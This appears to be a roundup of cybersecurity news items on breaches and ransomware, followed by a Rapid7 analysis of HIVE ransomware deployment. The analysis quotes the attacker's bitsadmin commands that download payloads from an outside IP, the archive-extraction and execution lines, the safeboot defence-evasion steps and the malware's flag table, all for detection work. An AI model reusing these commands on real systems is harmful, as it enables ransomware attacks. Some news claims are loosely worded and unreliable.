The first news that is trending is associated with financial service provider PayPal. News is out that social security numbers of nearly 35,000 users were leaked in a cyber attack that could have emerged from a credential stuffing campaign launched by a state funded actor.
According to the update provided by a source from PayPal, the attack took place on December 6 and was identified at the end of last month. Preliminary inquiries revealed that information such as usernames, dobs and individual tax numbers of individuals was accessed by hackers.
However, on a positive note, none of the siphoned info was found misused and the payment systems remained intact with no compromise logins.
All affected customers will be contacted via email and victims will be provided with a theft monitoring service via Equifax for the next 2 years, says a source from the American multinational financial tech company.
Second is the news related to the government of Iran, whose servers have been targeted by a threat actor dubbed Backdoor Diplomacy between July and December 2022. Security firm Palo Alto Networks Unit 42 was the first to discover the digital invasion and has linked the threat linked to Chinese APT group.
MailChimp, the automation based marketing company, is the third to hit the news headlines on Google as its servers have become a victim of a social engineering attack that led to a data leak. According to the official statement from the company, the leak took place on January 11th,2023 through a tool exploit related to Mailchimp Customer Support and Account Administration.
Prima facie reveals the attack took place when hackers got hold of sensitive login info after compromising a computing device used by an employee and a contractor leading to info steal of employee credentials.
Cybersecurity Insiders have resources data from its sources that the attack led to info leak related to companies in cryptocurrency and finance business fields.
Fourth is the news related to Ransomware and is sure to bring in smiles on the faces of all of them who are against the crime and its money minting tactics.
According to an analysis carried by Chainalysis, blockchain technology-based firm that is into research, payments related to ransomware have decreased in the past few months witnessing roughly a drop of 40% from record-breaking $765 million to $456 million in the past two years.
This suggests that most of the victims in the past 16-20 months either failed to pay the ransom or openly confessed to the criminals that they do not want to bow down to their demands.
It is unclear whether the victims faced serious repercussions for denying a pay to the criminals. However, payment refusal also means that the targeted victims could recover their encrypted data by other means, like via backups or free decryption keys offered by many security firms these days.
Thus, it clearly suggests that the business of spreading file encrypting malware is not lucrative anymore. So, are the criminals going to shift their business focus to other means or will they intensify the malware to a new peak, will only be known with time.
It is the world's most active ransomware group - responsible for an estimated 40% of all ransomware infections worldwide.
Find out what you need to know about LockBit in my article on the Tripwire State of Security blog.
Yum Brands Inc, officially the owner of top food chain restaurants KFC, Taco Bell and Pizza Hut, was reportedly hit by a ransomware attack, forcing the IT staff to close about 300 eatery outlets across the United Kingdom.
As the malware targeted, the core servers, orders and billing were deeply affected, resulting in temporary shut of the outlets from afternoon hours of January 18th, 2023, i.e. Wednesday.
Currently, the security measures to contain the malware spread have been placed, and the situation is reported to be under control. However, cybersecurity experts pressed into service have confirmed that recovery from the incident might take time and stores might have to operate for some days on a manual note, with pen & paper.
Yum! Brands, happens to be the second known business firm in the UK that has been hit by a cyber attack. Just within a few days after the postal service, ‘Royal Mail’ was hit by LockBit ransomware- linked to Russia.
In December 2022, Vice Society targeted school districts and Universities operating in United Kingdom. The Play Ransomware group was held responsible for disrupting services on cloud service provider Rackspace in the same month.
The only good news is that none of the customer data was compromised in the incident and Yum confirmed this in its official statement. It also cleared the air that it has no intention to bow down to the demands of hackers and pay a ransom.
NOTE- In a ransomware incident, hackers first steal information from the targeted database and then encrypt it until a ransom is paid in Cryptocurrency. So, only time can give an apt answer on whether any information steal took place in the attack on Yum Brands Inc.
Microsoft issued a press update that Cuba Ransomware gang were after its exchange servers after exploiting critical server-side request forgery (SSRF) vulnerability. Incidentally, the same flaw is also being exploited by ‘Play’ Ransomware group that hacked into the cloud servers of Rackspace via an OWASSRF exploit.
Windows OS giant says that the threat actors were striking the servers after bypassing ProxyNotShell URL rewrite abilities.
Both the vulnerabilities that are now being used by two gangs spreading ransomware were identified and patched by the Redmond giant at the end of November 2022.
The report is also available to customers using Microsoft 365 defender, and Defender endpoint plan 2 or for business subscribers holding a premium plan.
Coming the earnings statistics of Cuba Ransomware, the said notorious gang of criminals struck around 100 targets till August last year on a global note and raked in $60 million in ransoms.
Surprisingly, the gang members are not very active online, thus making it difficult to track them down. They either launch attack campaigns at the end of months or in the past months of a year and end their activities by August of every year.
It is unclear whether they go on a holiday afterwards or hired for the capabilities by other gangs.
FBI issued an advisory in December last year stating that the Cuba gang is after US Critical infrastructure, as they have already targeted 49 organizations, including companies that are into generation and distribution of power and a water utility. As the impact was minimal, the activity went unnoticed by the media, but was notified to the Biden administration.
Argentina’s Judiciary of Cordoba, Belgium City of Antwerp, Rackspace and the German H-Hotels are some of its targeted companies for now.
A healthcare provider from Pennsylvania issued a ransomware alert after 9 months and confirmed that the hackers accessed personal data from its servers and might misuse it anytime. The reason for the delay in informing the affected people is yet to be revealed, but sources state that the identification, analysis, recovery and mitigation took most of the time and made the non-profit organization make the incident public on January 10th,2023.
Going deep into the details, Maternal & Family Health Services aka MFHS in short, released a press statement, last weekend that a ransomware gang compromised its servers in April 4th of last year and admitted that the malware attack could have taken place in August 8th, 2021 or even before.
Although MFHS did not mention the exact number of affected residents, estimates are in that 461070 people, including 68 residents from Maine, patient info, employee info and vendors details were accessed by hackers in the attack.
Unidentified people familiar with the matter say that details such as names, addresses DOBs, driver license numbers, social security numbers, health insurance details, medical history, and financial info such as credit and debit card details were accessed by hackers
Info on who was behind the ransomware attack, whether the US Family planning NFP organization paid any ransom to recover data is yet to be illustrated.
NOTE- Ransomware spreading gangs has a penchant for healthcare related data as it offers great value when sold on the dark web.
The experts at security firm Bitdefender have released a universal decryptor for victims of the MegaCortex family of ransomware, which is estimated to have caused more than 1800 infections - mostly of businesses.
How malicious actors evade detection and disable defenses for more destructive HIVE Ransomware attacks.
Rapid7 routinely conducts research into the wide range of techniques that threat actors use to conduct malicious activity. One objective of this research is to discover new techniques being used in the wild, so we can develop new detection and response capabilities.
Recently, Rapid7 observed a malicious actor performing several known techniques for distributing ransomware across many systems within a victim’s environment. In addition to those techniques, the actor employed a number of previously unseen techniques designed to to drop the defenses of the victim, inhibit monitoring, disable networking and allow time for the ransomware to finish encrypting files. These extra steps would make it extremely difficult, if not impossible, for a victim to effectively use their security tools to defend endpoints after a certain point in the attack.
Rapid7 has updated existing and added new detections to InsightIDR to defend against these techniques. In this article, we’ll explore the techniques employed by the threat actor, why they’re so effective, and how we’ve updated InsightIDR to protect against them.
What approach did the malicious actor take to prepare the victim's environment?
Initially using Cobalt Strike, the malicious actor retrieved system administration tools and malicious payloads by using the Background Intelligent Transfer Service (BITSAdmin).
"C:\Windows\system32\bitsadmin.exe" /transfer debjob /download /priority normal http://79.137.206.47/PsExec.exe C:\Users\Public\PsExec.exe
bitsadmin /transfer debjob /download /priority normal http://79.137.206.47/int.exe C:\Windows\int.exe
The malicious actor then began using the remote process execution tool PSExec to execute batch files (rdp.bat) that would cause registry changes to enable Remote Desktop sessions (RDP) using reg.exe. This enabled the malicious actor to laterally move throughout the victim’s environment using the graphical user interface.
Rapid7 observed the malicious actor add/change policies for the Active Directory domain to perform the following:
Copy down batch scripts
Execute batch scripts (file1.bat), which:
Creates administrator account on the local system
Reconfigures boot configuration data (bcdedit.exe) so that the host will not load any additional drivers or services (ie: network drivers or endpoint protection)
Sets various registry values to ensure the created local administrator user will automatically logon by default
Changes the Windows Shell from Explorer to their malicious script (file2.bat)
Reboots the system with the shutdown command
On reboot, the system logs in and executes the shell (file2.bat), which:
Extracts HIVE ransomware payload(s) from an encrypted archive (int.7z) using 7-Zip's console executable (7zr.exe)
Executes the ransomware payload (int.exe or int64.exe)
Below are some commands observed executed by the malicious actor (with necessary redactions):
Rapid7 also observed the malicious actor extracting HIVE ransomware payload using 7zip's console application (7zr.exe) from encrypted 7zip archive (int.7z) with a simple password (123):
"C:\windows\7zr.exe" x c:\windows\int.7z -p123 -oc:\windows
The malicious actor then manually executed the ransomware (int.exe) once with only the required username:password combination passed to the -u flag. This presumably encrypted the local drive and also all network shares the user had access to:
"C:\Windows\int.exe" -u <REDACTED>:<REDACTED>"
The malicious actor also manually executed the 64 bit version of the ransomware (int64.exe) once on a different host with the -no-discovery flag. This is likely intended to override the default behavior and not discover network shares to encrypt their files. The -u flag was also passed and the same values for the username:password were provided as seen on the other host.
Deployment of ransomware using Active Directory group policies allows the malicious actor to hit all systems in the environment for as long as that group policy is active in the victim’s environment. In this case, any system that was booting and connected to the environment would receive the configuration changes, encrypted archive containing the ransomware, a decompression utility to extract the ransomware, configuration changes and the order to reboot and execute. This can be especially effective if timed with deployments of patches that require a reboot, done at the beginning of the day or even remotely using Powershell's Stop-Computer cmdlet.
Storing the ransomware within a 7zip encrypted archive (int.7z) with a password even as simple as (123) makes the task of identifying the ransomware on disk or transmitted across the network nearly impossible. This makes retrieval and staging of the malicious actors payload very difficult to spot by security software or devices (Antivirus, Web Filtering, IDS/IPS and more). In this case, the malicious actor has taken care to only put the encrypted copy on the disk of a victim’s system and not execute it until they have fully dropped the defenses on the endpoint.
Reconfiguring the default boot behavior to safeboot minimal and then executing a reboot unloads all but the bare minimum for the Windows operating system. With no additional services, software or drivers loaded the system is at its most vulnerable. With no active defenses (Antivirus or Endpoint Protection) the system comes up and tries to start its defined shell which has been swapped to a batch script (file2.bat) by the malicious actor.
It should be noted that in this state, there is no method of remotely interacting with the system as no network drivers are loaded. In order to respond and halt the ransomware, each host must be physically visited for shutdown. Manually priming the host in this way is more effective than the existing capabilities of the HIVE ransomware which stops specific defensive services (Windows Defender, etc) and kills specific processes prior to encrypting the contents of the drive.
All systems in this state are left automatically logged in as an administrator, which gives anyone who has physical access complete control. Lastly, the system will continue to boot into safeboot minimal mode by default (again, no networking) until each system is set back to its original state with a command such as below. Bringing the host back online in this state will still continue to execute the malware when logged into, which will also enable the default network spreading behavior.
bcdedit /deletevalue {default} safeboot
Lastly, the malicious actor also manually executed the payload a few times on systems that had not been put into safeboot minimal and rebooted. Systems they executed with only the -u flag actively searched out network shares they had access to and encrypted their contents. This ensures that only the intended hosts do network share encryption and all those that were rebooted into safeboot minimal do not flood the network simultaneously encrypting all files. It also means that the contents of network file shares that are not Windows based (various NAS devices, Linux hosts using Samba) will be encrypted even if the payload is not actually deployed on that specific host. This approach would be extremely destructive to both corporate environments and home users with network attached storage systems for backups. Rapid7 notes that ThreatLocker have reported on similar activity in their knowledge base article entitled Preventing BCDEdit From Being Weaponized.
Malware analysis of HIVE sample
Rapid7 observed that the HIVE payload would not execute unless a flag of -u was passed. During analysis it was discovered that passing -u asdf:asdf would result in the Login and Password (colon-delimited) provided to the victim to authenticate to the site behind the onion link on the TOR network:
The new flags -t, -timer, --timer effectively cause the malware to wait the specified number of seconds before going on to perform its actions. The other new flags -low-key, --low-key will cause the ransomware to focus on only its encryption of data and not perform pre-encryption tasks, including deleting shadow copies (malicious use of vssadmin.exe, wmic.exe), deleting backup catalogs (malicious use of wbadmin.exe), and disabling Windows Recovery Mode (malicious use of bcdedit.exe). These features give the malicious actor more control over how/when the payload is executed and skirt common methods of command line and parent/child process related detection for most ransomware families.
Fundamentally, the sample’s respective flags distill down into encryption operations of local, mount and discovery. The local module utilizes the LookupPrivilegeValueW and AdjustTokenPrivileges that Windows API calls on its own process via GetCurrentProcess and OpenProcessToken to obtain SeDebugPrivilege privileges. This is presumably crucial for OpenProcess -> OpenProcessToken -> ImpersonateLoggedOnUser API call attempts to processes: winlogon.exe and trustedinstaller.exe to subsequently stop security services and essential processes, if the --low-key is not passed during execution. ShellExecuteA is also used to launch various Windows binaries (bcdedit.exe, notepad.exe, vssadmin.exe, wbadmin.exe, wmic.exe) for destruction of backups and ransom note display purposes. The mount module will use NetUseEnum to identify the current list of locally-mounted network shares and add them to the list to be encrypted. Lastly, the discovery module will use NetServerEnum to identify available Windows hosts within the domain/workgroup. This list is then used with NetShareEnum to identify file shares on each remote host and add them to the list of locations to have their files encrypted.
By default, all three modes (local, mount and discovery)are enabled, so all local, mounted and shares able to be enumerated will have their contents encrypted. This effectively ransoms all systems in a victim’s environment with a single execution of HIVE—when performed by a privileged user such as a Domain or Enterprise Admin account. Command line flags may be used to change this behavior and invoke one or more of the modules. For instance—local-only will use only the local module while—network-only will use the mount and discovery modules.
Flag
Description
-u
<username>:<password> for login for hivecust*.onion domain to identify victim
-da
<domainname>\<username>:<password> use different credentials when doing network spreading. Likely shorthand for "Domain Admin". Calls LogonUserW triggering an 4624(S): Type 3 Network Logon event. Will then call ImpersonateLoggedOnUser using the token in the response from LogonUserW.
-low-key --low-key
Encrypt files and open ransom note, if local filesystem is to be encrypted, but do not spawn other binaries (vssadmin.exe, WMIC.exe, wbadmin.exe, bcdedit.exe) to perform other destructive actions for impact. Will also skip enumeration and stopping of antivirus software.
-no-local --no-local
Do not encrypt local files
-no-mounted
--no-mounted
Do not encrypted mounted filesystems
-no-discovery
--no-discovery
Do not enumerate or encrypt file shares on the network
-local-only --local-only
Only encrypt local file systems
-network-only --network-only
Only encrypt file shares on the network.
-explicit-only --explicit-only
Only encrypt files in this specific path specified
-min-size --min-size
Only encrypt files greater than or equal to a specific number of bytes
-t -timer --timer
Do not encrypt files until after specified number of seconds
By default, the ransomware will execute the following child processes with the following arguments:
Use of vssadmin.exe in order to delete shadow copies of files which deletes unencrypted backups of files they are attempting to ransom:
Rapid7 has detections in place within InsightIDR through Insight Agent to detect this type of ransomware activity. However, since the malicious actor is rebooting into safemode minimal state, endpoint protection software and networking will not be running while the endpoint is executing ransomware.
So, identifying the actions of a malicious actor before ransomware is deployed is crucial to preventing the attack. In other words, it is essential to identify malicious actors within the environment and eject them before the ransomware payload is dropped.
The following detections are now available InsightIDR to identify this attacker behavior.
Attacker Technique - Auto Logon Count Set Once
Attacker Technique - Potential Process Hollowing To DLLHost
Attacker Technique - Shutdown With Message Used By Malicious Actors
Attacker Technique - URL Passed To BitsAdmin
Lateral Movement - Enable RDP via reg.exe
Suspicious Process - BCDEdit Enabling Safeboot
Suspicious Process - Boot Configuration Data Editor Activity
Suspicious Process - DLLHost With No Arguments Spawns Process
Suspicious Process - Rundll32.exe With No Arguments Spawns Process
Suspicious Process - ShadowCopy Delete Passed To WMIC
Suspicious Process - Volume Shadow Service Delete Shadow Copies
IOC's
Type
Value
Registry Key
HKLM\System\CurrentControlSet\Control\Terminal Server
By Doron Pinhas, Chief Technology Officer, Continuity
2022 clearly demonstrated that attacks on data represent the greatest cyber-threat organizations face. The attack pace not only continued, it accelerated. Notable data breaches took place at Microsoft, News Corp., the Red Cross, FlexBooker, Cash App, GiveSendGo, and several crypto firms.
Many of these attacks took advantage of known vulnerabilities and security misconfigurations in storage and backup systems. Continuity exposed the extent of the problem two years ago: on average, enterprise storage devices have 16 security misconfigurations, of which three are critical. And backup and storage systems are rife with unpatched CVEs.
To make matters worse, the political climate is likely to breed more nation-state sponsored cyberattacks. Job dissatisfaction and surging unemployment across the technology sector is likely to spur more insider threats. Organizations are being confronted on all sides by cyber-danger.
Here are our top 4 predictions on how this will play out in 2023:
More Data Attacks, Greater Sophistication, Bigger Monetary Losses
There is an old saying that generals tend to fight the last battle or the last war i.e., they use tactics that would have been best suited to an earlier conflict. The U.S, for example, used World War II and Korean War tactics in Vietnam and came off poorly to the guerilla approach used by the Vietcong.
Similarly in cybersecurity, enterprises typically proof themselves up against last year’s strategies and attack vectors. By the time they adjust their processes, beef up their defenses, and add new layers of security, they find themselves battling more virulent ransomware strains and cyber-scams. That is why it has been clear for a couple of years that organizations are always playing catchup to cybercriminal gangs. Hence the coming year will inevitably see more data attacks with greater sophistication resulting in ever higher monetary and business losses.
This brings about a vicious circle. As criminals enjoy more success, they reinvest some of the profits in better technology, more powerful systems, and better organized gangs. Thus, we are seeing the appearance of developments such as ransomware-as-a-service and the evolution of a cybercrime supply chain composed of distinct elements, each performing specialized functions that dovetail together into the eventual heist.
Slow Gains on Storage and Backup Security
Awareness about the perils of backup, storage, and data recovery is rising – but nowhere near quickly enough to catch up with the cyber-attack innovation. Only a couple of years ago, the prevailing view was that storage and backup systems were largely immune to attack as they were backend systems. That fallacy is dawning on more and more IT and security personnel. As more backups are infected with ransomware and more storage and backup vulnerabilities are used to infiltrate other enterprise systems, the word is getting out – slowly.
But for every enterprise that takes action to shore up the many storage and backup vulnerabilities and misconfigurations that exist, there is another that is wide open to attack. In 2023, therefore, we will see well-known storage CVEs being exploited for criminal gain as organizations failed to implement available patches. Similarly, we will see cybergangs continuing to exploit gaping holes in organizational security that can be traced back to well-publicized storage and backup misconfigurations.
To lessen the damage, organizations are advised to focus on the protection of their data. Add new layers of protection across their backup and storage infrastructure to thwart efforts that bypass networking and endpoint security. Make it extremely difficult to tamper with backups and exfiltrate data.
Insurance Refusals and Rate Hikes
Many organizations remain unaware of the threat posed to their data by insecure storage and backup systems. But not insurance companies. Those offering cyber-insurance are putting pressure on organizations to up their data protection game. They are demanding more thorough assessments of IT, storage, and backup infrastructure before they offer a policy. Those performing poorly in these assessments face much higher rates or even complete refusal to insure. On the other hand, those organizations that demonstrate excellence in storage and backup security could save money.
The Rise of Automated Storage and Backup Validation
Organizations typically house a LOT of data. Whether it is on-premises or in the cloud, there are numerous repositories of storage and backup data spread all over the place. Most organizations do a poor job assessing where all their data is resides. And an even poorer job of understanding where potential weaknesses may lie.
Automation is needed to inventory the enterprise to find any and all storage and backup resources. Once inventoried, that data needs to be scanned to isolate unpatched vulnerabilities, security misconfigurations, and other weak points. Unfortunately, traditional vulnerability scanners and patch management systems focus on application, network and OS insecurity. They do well at scanning these systems, but are found badly wanting when it comes to scanning storage and backup systems for vulnerabilities.
With growing pressure to improve security and increase compliance efforts, 2023 will see organizations start to invest in automated storage and backup security validation, reporting, and compliance evidence generation. That, in turn, will lead to security professionals becoming more educated in data storage in general. Currently, they are insufficiently versed in data storage and backup technologies and their associated security requirements. We will begin to see that shifting in 2023.
A Canadian college and a global investment firm’s computer network were compromised with ransomware after hackers broke into the virtual private network of Fortinet devices. The incident was discovered by the security researchers from eSentire in October 2022. But for reasons they made the information public in Jan 2023.
eSentire’s Threat Response Unit (TRU) stated that the attack took place on the devices of the Fortinet through a bypass vulnerability named CVE-2022-40684
Though Fortinet that is into the business of selling security solutions such as firewalls and antivirus solutions has fixed the flaw, it appears to be too late, as hackers are buying and selling details of compromised devices on some hacking forums.
eSentire TRU named the newly found ransomware as Kalaja-Tomorr or Kalajatomorr that emerged in March 2022 and is targeting only English-speaking companies. Albania seems to be the birthplace of Kalajatomorr and was developed with the AES+RSA algorithm that is hard to break and decrypt.
As of now, the group is charging a hefty fee to offer a decryption key and specializes in transforming itself as a data wiper.
Microsoft’s threat intelligence unit is already behind the group and is said to soon offer a decryption key for Kalajatomorr.
NOTE- According to a report compiled by the FBI after a detailed study, every year around 316 ransomware variants come into operations and are being observed since 2018. However, only 9-10 of them get into the public eye with deeds and rest either lose their sheen or survive on mere $15to $2k ransom payments made with volatile- cryptocurrencies such as BTC.
